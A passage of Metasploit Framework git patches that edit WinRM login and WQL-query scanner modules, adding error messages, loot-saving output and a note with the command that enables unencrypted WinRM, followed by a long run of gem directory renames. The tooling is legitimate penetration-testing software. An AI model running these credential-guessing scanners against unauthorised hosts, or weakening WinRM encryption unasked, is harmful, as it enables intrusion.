resp.nil? + print_error "Got no reply from the server" + return + end if resp.code == 401 print_error "Login Failure! Recheck the supplied credentials." return @@ -61,7 +65,8 @@ class Metasploit3 < Msf::Auxiliary end resp_tbl = parse_wql_response(resp) print_good resp_tbl.to_s - store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + path = store_loot("winrm.wql_results", "text/csv", ip, resp_tbl.to_csv, "winrm_wql_results.csv", "WinRM WQL Query Results") + print_status "Results saved to #{path}" end From 98c1272b924f162afce096ad9f463280c6a51158 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:11:00 -0500 Subject: [PATCH 46/64] Update the description about AllowUnencrypted --- modules/auxiliary/scanner/winrm/winrm_login.rb | 10 ++++++++-- modules/auxiliary/scanner/winrm/winrm_wql.rb | 14 +++++++++++--- 2 files changed, 19 insertions(+), 5 deletions(-) 
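Review bot: The new no-reply message in the hunk at -48 does not say which host failed: `print_error "Got no reply from the server"`. The module includes `Msf::Auxiliary::Scanner` and `run_host` takes an `ip`, presumably once per scanned address, so this line cannot be tied to a target when several hosts are scanned. `print_error "Got no reply from #{ip}"` would match the unexpected-response message a few lines further down. `run_host` begins above this hunk.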
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 198bdd83d6..146a863da1 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. - Kerberos is not currently supported. - }, + Kerberos is not currently supported. Please note: in order to use this + module, the 'AllowUnencrypted' winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'References' => [ @@ -77,3 +78,8 @@ class Metasploit3 < Msf::Auxiliary end end + +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 8cb82a2db9..5cbdc5452d 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -29,7 +29,9 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module runs WQL queries against remote WinRM Services. Authentication is required. Currently only works with NTLM auth. - }, + Please note in order to use this module, the 'AllowUnencrypted' + winrm option must be set. + }, 'Author' => [ 'thelightcosine' ], 'License' => MSF_LICENSE ) @@ -69,6 +71,12 @@ class Metasploit3 < Msf::Auxiliary print_status "Results saved to #{path}" end - - end + +=begin +=begin +To set the AllowUncrypted option: +winrm set winrm/config/service @{AllowUnencrypted="true"} +=end + +=end \ No newline at end of file From 9736d352300557fe52f6b66f84912bb567593a30 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 31 Oct 2012 15:13:21 -0500 Subject: [PATCH 47/64] Fix syntax error --- modules/auxiliary/scanner/winrm/winrm_wql.rb | 3 --- 1 file changed, 3 deletions(-) 
diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 5cbdc5452d..31fabd59ec 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -73,10 +73,7 @@ class Metasploit3 < Msf::Auxiliary end -=begin =begin To set the AllowUncrypted option: winrm set winrm/config/service @{AllowUnencrypted="true"} =end - -=end \ No newline at end of file From 6aed38f30919de89fa20a2431a872e0b3656d1c3 Mon Sep 17 00:00:00 2001 
From: Luke Imhoff Date: Thu, 1 Nov 2012 08:39:18 -0500 Subject: [PATCH 48/64] Update metasploit_data_models paths for version 0.3.0 --- .../.gitignore | 0 .../.rspec | 0 .../Gemfile | 0 .../LICENSE | 0 .../README.mdown | 0 .../Rakefile | 0 .../bin/mdm_console | 0 .../console_db.yml | 0 .../lib/metasploit_data_models.rb | 0 .../lib/metasploit_data_models/active_record_models/api_key.rb | 0 .../lib/metasploit_data_models/active_record_models/client.rb | 0 .../lib/metasploit_data_models/active_record_models/cred.rb | 0 .../lib/metasploit_data_models/active_record_models/cred_file.rb | 0 .../lib/metasploit_data_models/active_record_models/event.rb | 0 .../active_record_models/exploit_attempt.rb | 0 .../metasploit_data_models/active_record_models/exploited_host.rb | 0 .../lib/metasploit_data_models/active_record_models/host.rb | 0 .../metasploit_data_models/active_record_models/host_detail.rb | 0 .../lib/metasploit_data_models/active_record_models/host_tag.rb | 0 .../metasploit_data_models/active_record_models/imported_cred.rb | 0 .../lib/metasploit_data_models/active_record_models/listener.rb | 0 .../lib/metasploit_data_models/active_record_models/loot.rb | 0 .../lib/metasploit_data_models/active_record_models/macro.rb | 0 .../lib/metasploit_data_models/active_record_models/mod_ref.rb | 0 .../metasploit_data_models/active_record_models/module_action.rb | 0 .../metasploit_data_models/active_record_models/module_arch.rb | 0 .../metasploit_data_models/active_record_models/module_author.rb | 0 .../metasploit_data_models/active_record_models/module_detail.rb | 0 .../metasploit_data_models/active_record_models/module_mixin.rb | 0 .../active_record_models/module_platform.rb | 0 .../lib/metasploit_data_models/active_record_models/module_ref.rb | 0 .../metasploit_data_models/active_record_models/module_target.rb | 0 .../active_record_models/nexpose_console.rb | 0 .../lib/metasploit_data_models/active_record_models/note.rb | 0 
.../lib/metasploit_data_models/active_record_models/profile.rb | 0 .../lib/metasploit_data_models/active_record_models/ref.rb | 0 .../lib/metasploit_data_models/active_record_models/report.rb | 0 .../active_record_models/report_template.rb | 0 .../lib/metasploit_data_models/active_record_models/route.rb | 0 .../lib/metasploit_data_models/active_record_models/service.rb | 0 .../lib/metasploit_data_models/active_record_models/session.rb | 0 .../metasploit_data_models/active_record_models/session_event.rb | 0 .../lib/metasploit_data_models/active_record_models/tag.rb | 0 .../lib/metasploit_data_models/active_record_models/task.rb | 0 .../lib/metasploit_data_models/active_record_models/user.rb | 0 .../lib/metasploit_data_models/active_record_models/vuln.rb | 0 .../metasploit_data_models/active_record_models/vuln_attempt.rb | 0 .../metasploit_data_models/active_record_models/vuln_detail.rb | 0 .../lib/metasploit_data_models/active_record_models/vuln_ref.rb | 0 .../lib/metasploit_data_models/active_record_models/web_form.rb | 0 .../lib/metasploit_data_models/active_record_models/web_page.rb | 0 .../lib/metasploit_data_models/active_record_models/web_site.rb | 0 .../lib/metasploit_data_models/active_record_models/web_vuln.rb | 0 .../metasploit_data_models/active_record_models/wmap_request.rb | 0 .../metasploit_data_models/active_record_models/wmap_target.rb | 0 .../lib/metasploit_data_models/active_record_models/workspace.rb | 0 .../lib/metasploit_data_models/base64_serializer.rb | 0 .../lib/metasploit_data_models/serialized_prefs.rb | 0 .../lib/metasploit_data_models/validators/ip_format_validator.rb | 0 .../validators/password_is_strong_validator.rb | 0 .../lib/metasploit_data_models/version.rb | 0 .../metasploit_data_models.gemspec | 0 .../metasploit_data_models_live.gemspec | 0 .../spec/lib/base64_serializer_spec.rb | 0 .../spec/spec_helper.rb | 0 ...s-0.0.2.43DEV.gemspec => metasploit_data_models-0.3.0.gemspec} | 0 66 files changed, 0 insertions(+), 0 deletions(-) 
rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/.gitignore (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/.rspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/Gemfile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/LICENSE (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/README.mdown (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/Rakefile (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/bin/mdm_console (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/console_db.yml (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/api_key.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/client.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/cred_file.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/event.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/exploit_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/exploited_host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/host_tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/imported_cred.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/listener.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/loot.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/macro.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/mod_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_action.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => 
metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_arch.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_author.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_detail.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_mixin.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_platform.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/module_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/nexpose_console.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/note.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/profile.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => 
metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/report.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/report_template.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/route.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/service.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/session.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/session_event.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/tag.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/task.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/user.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/vuln_attempt.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/vuln_detail.rb (100%) rename 
lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/vuln_ref.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/web_form.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/web_page.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/web_site.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/web_vuln.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/wmap_request.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/wmap_target.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/active_record_models/workspace.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/base64_serializer.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/serialized_prefs.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/validators/ip_format_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => 
metasploit_data_models-0.3.0}/lib/metasploit_data_models/validators/password_is_strong_validator.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/lib/metasploit_data_models/version.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/metasploit_data_models.gemspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/metasploit_data_models_live.gemspec (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/spec/lib/base64_serializer_spec.rb (100%) rename lib/gemcache/ruby/1.9.1/gems/{metasploit_data_models-0.0.2.43DEV => metasploit_data_models-0.3.0}/spec/spec_helper.rb (100%) rename lib/gemcache/ruby/1.9.1/specifications/{metasploit_data_models-0.0.2.43DEV.gemspec => metasploit_data_models-0.3.0.gemspec} (100%) diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.gitignore diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/Gemfile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Gemfile 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/README.mdown b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/README.mdown rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/README.mdown diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/console_db.yml 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/client.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/cred_file.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/cred_file.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/cred_file.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/event.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/imported_cred.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.0.2.43DEV/lib/metasploit_data_models/active_record_models/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/lib/metasploit_data_models/active_record_models/macro.rb
